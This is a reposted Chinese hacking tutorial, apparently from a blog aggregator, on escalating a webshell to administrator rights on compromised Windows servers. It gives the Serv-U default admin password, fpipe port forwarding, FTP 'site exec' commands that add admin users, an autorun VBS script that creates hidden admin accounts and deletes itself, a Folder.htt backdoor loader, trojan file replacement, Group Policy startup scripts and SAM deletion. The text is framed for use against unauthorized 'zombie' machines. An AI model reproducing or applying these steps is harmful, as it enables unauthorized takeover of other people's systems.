分享一下我老師大神的人工智能教程。零基礎！通俗易懂！風趣幽默！還帶黃段子！希望你也加入到我們人工智能的隊伍中來！https://blog.csdn.net/jiangjunshow

動網上傳漏洞，相信大家拿下不少肉雞吧，但是都是WEBSHELL，不能拿到系統權限，要如何拿到系統權限呢？這正是我們這次要討論的內容
OK，進入我的WEBSHELL?????????????
啊哈，不錯，雙CPU，速度應該跟的上，不拿下你我怎么甘心啊
輸入密碼，進入到里面看看，有什么好東西沒有，翻了下，好像也沒有什么特別的東西，看看能不能進到其他的盤符，點了下C盤，不錯不錯，可以進去，這樣提升就大有希望了
一 serv－u提升
OK，看看他的PROGRAME里面有些什么程序，哦，有SERV-U，記得有次看到SERV-U有默認的用戶名和密碼，但是監聽的端口是43958，而且是只有本地才能訪問的，但是我們有端口轉發工具的啊，不怕。先看看他的SERV-U的版本是多少，telnet XXX.XXX.XXX.XXX 21
顯示竟然是3.0的，唉，不得不說這個管理員真的不稱職。后來完畢后掃描了下，也只有FTP的洞沒有補。既然是這樣，我們就開始我們的提升權限了
上傳FPIPE，端口轉發工具， 圖三
在運行CMD命令里輸入d:/wwwroot/fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本機的43598端口轉發到81端口
然后打開我們自己機子上的SERV-U，點Serv－U服務器，點菜單欄上的的服務器，點新建服務器，然后輸入IP，輸入端口，記得端口是剛剛我們轉發的81端口。服務名稱隨便你喜歡，怎么樣都行。然后是用戶名：LocalAdministrator? 密碼：#l@$ak#.lk;0@P?? (密碼都是字母)
確定，然后點剛剛建的服務器，然后就可以看到已有的用戶，自己新建一個用戶，把所有權限加上。也不鎖定根目錄
接下來就是登陸了，登陸FTP一定要在CMD下登陸，
進入后一般命令和DOS一樣，添加用戶的時候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果對方開了3389的話，就不用我教你怎么做了，沒開的話，新建立IPC連接，在上傳木馬或者是開啟3389的工具
二
auto.ini 加 SHELL.VBS

autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dim wsh?
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是這樣要可以訪問到對方的根目錄。將這兩個文件放到對方硬盤的根目錄下。當然你也可以直接執行木馬程序，還要一個木馬程序，但是語句就和最后兩句一樣，通過CMD執行木馬程序
三
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini，還有你的木馬或者是VBS或者是什么，放到對方管理員最可能瀏覽的目錄下，覺得一個不夠，可以多放幾個
Folder.htt添加代碼
<OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后門文件名”>
</OBJECT>
但是后門和這兩個文件必須要放到一塊，有點問題，可以結合啟動VBS，運行結束后，刪除上傳的后門.就是CODEBASE="shell.vbs".shell寫法如上

四
replace
替換法，可以替換正在執行的文件。用這個幾乎可以馬上得到權限，但是我沒有做過試驗，可以試下，將對方正在執行的文件替換為和它文件名一樣的，捆綁了木馬的。為什么不直接替換木馬呢？如果替換的是關鍵程序，那不是就直接掛了？所以還是捆綁好點
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W]

　[drive1:][path1]filename 指定源文件。
　[drive2:][path2] 指定要替換文件的
　　　　　　　　　　　　　 目錄。
　/A 把新文件加入目標目錄。不能和
　　　　　　　　　　　　　 /S 或 /U 命令行開關搭配使用。
　/P 替換文件或加入源文件之前會先提示您
　　　　　　　　　　　　　 進行確認。
　/R 替換只讀文件以及未受保護的
　　　　　　　　　　　　　 文件。
　/S 替換目標目錄中所有子目錄的文件。
　　　　　　　　　　　　　 不能與 /A 命令選項
　　　　　　　　　　　　　 搭配使用。
　/W 等您插入磁盤以后再運行。
　/U 只會替換或更新比源文件日期早的文件。
　　　　　　　　　　　　　 不能與 /A 命令行開關搭配使用
這個命令沒有試驗過，看能不能替換不能訪問的文件夾下的文件，大家可以試驗下
五
腳本
編寫一個啟動/關機腳本配置文件scripts.ini，這個文件名是固定的，不能改變。內容如下：

[Startup]
0CmdLine=a.bat
0Parameters=

將文件scripts.ini保存到“C:/winnt/system32/GroupPolicy/Machine/Scripts”
A.BAT的內容可以是NET USER yonghu mima
也可以是NET USER ADMINistrator? XXX
這樣可以恢復你想要得任意用戶名的密碼，也可以自己增加新的用戶，但是要依賴重啟，還有就是對SYSTEM32有寫的權限
六
SAM
如果可以訪問對方的SYSTEM32的話，刪除對方的SAM文件，等他重啟以后就是ADMIN用戶密碼為空
突然又有了想法，可以用REPLACE命令替換的嗎，可以把你的SAM文件提取出來，上傳到他的任意目錄下，然后替換。不過不知道如果對SYSTEM32沒有權限訪問的話，能不能實現替換

???????????

分享一下我老師大神的人工智能教程。零基礎！通俗易懂！風趣幽默！還帶黃段子！希望你也加入到我們人工智能的隊伍中來！https://blog.csdn.net/jiangjunshow

總結

以上是生活随笔為你收集整理的WEBSHELL权限提升 菜菜的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。